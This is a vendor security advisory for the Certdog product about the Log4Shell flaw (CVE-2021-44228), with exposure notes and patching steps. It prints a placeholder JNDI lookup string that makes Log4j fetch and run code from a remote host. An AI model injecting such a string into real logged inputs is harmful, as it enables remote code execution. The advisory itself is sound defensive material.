Link Search Menu Expand Document

Certdog: CVE-2021-44228

Apache Log4j2 Vulnerability (Log4Shell)

A vulnerability exists in log4j2 that leverages JNDI to potentially allow an attacker to provide a string that is interpreted as a variable

JNDI does not enforce any security controls on LDAP requests, therefore if a string such as the following:

${jndi:ldap://[host]/[path]}

Could be logged, Log4J would interpret it as a variable and this would result in the classes available at the [host]/[path] location being downloaded and executed


Am I Vulnerable

Certdog uses the vulnerable library for local logging. It does not override the web server’s logging so is not vulnerable to User Agent attacks. But a user that has access to the system could insert a command such as the above

Certdog runs under a recent version of java by default that is also resistant to the attack, but if you have any instances of Certdog that are internet facing, you should take action now by following the What should we do section below

For internal-only instances it is recommended that these steps are also followed. Though the risk is much less, the steps are simple and will protect your instances further


What should we do

Download the updated start-tomcat.ps1 script from here

The SHA-1 hash of this file is:

b5bff4537e4667ff596ec4cb092add2124dff691

This script includes one extra setting:

-Dlog4j2.formatMsgNoLookups=True

Which prevents the lookups from being performed

From your certdog installation, backup the existing start-tomcat.ps1 script. E.g. from the following location (or where Certdog has been installed):

c:\certdog\bin\start-tomcat.ps1

And replace it with the one downloaded from the link above


Download the updated log4j2.xml file from here

The SHA-1 hash of this file is:

a7b7b1822e178a53fe6f0a8e940a22b443d0cdd0

From your certdog installation, backup the existing log4j2.xml file. E.g. from the following location (or where Certdog has been installed):

c:\certdog\config\log4j2.xml

And replace it with the one downloaded from the link above


Restart the Krestfield CertDog Service


What version of Log4j2 does Certdog use?

Version 1.5.0 and earlier use Log4J version 2.14.1


More Information

Contact Krestfield Support for more information